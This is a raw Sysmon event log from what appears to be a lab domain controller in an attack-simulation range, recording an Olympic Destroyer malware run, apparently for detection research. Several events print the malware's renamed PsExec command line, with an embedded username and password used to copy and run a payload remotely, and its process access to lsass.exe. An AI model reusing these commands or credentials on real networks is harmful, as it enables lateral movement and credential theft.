10341000x8000000000000000291805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.853{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E9-6216-4E05-000000003802}6868C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.815{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=86309640E83BBA071D01DB302A283C7C,SHA256=EE0F03CD22DC34A272B6690E9474FF11D9B9C5E2227AB6BB3E494D4F94E3F5C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.784{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.784{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.784{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.784{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.768{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F9-6216-C505-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.752{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-12F9-6216-C505-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.760{C8EA50B7-12F9-6216-C505-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.752{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F9-6216-C505-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.752{C8EA50B7-12F9-6216-C305-000000003802}6916C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.731{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F9-6216-C305-000000003802}6916C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.731{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F9-6216-C305-000000003802}6916C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:57.717{C8EA50B7-12F9-6216-C305-000000003802}6916C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.630{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F9-6216-C405-000000003802}1956C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.630{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F9-6216-C405-000000003802}1956C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.614{C8EA50B7-12F9-6216-C405-000000003802}19566396C:\Windows\system32\conhost.exe{C8EA50B7-12F9-6216-C305-000000003802}6916C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.567{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F9-6216-C405-000000003802}1956C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.567{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F9-6216-C405-000000003802}1956C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.498{C8EA50B7-12F9-6216-C105-000000003802}6372C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.482{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F9-6216-C105-000000003802}6372C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.482{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F9-6216-C105-000000003802}6372C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.482{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.482{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.482{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.482{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:57.451{C8EA50B7-12F9-6216-C105-000000003802}6372C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.429{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12F9-6216-C305-000000003802}6916C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.429{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-12F9-6216-C305-000000003802}6916C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.432{C8EA50B7-12F9-6216-C305-000000003802}6916C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.429{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F9-6216-C305-000000003802}6916C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.367{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F9-6216-C205-000000003802}7136C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 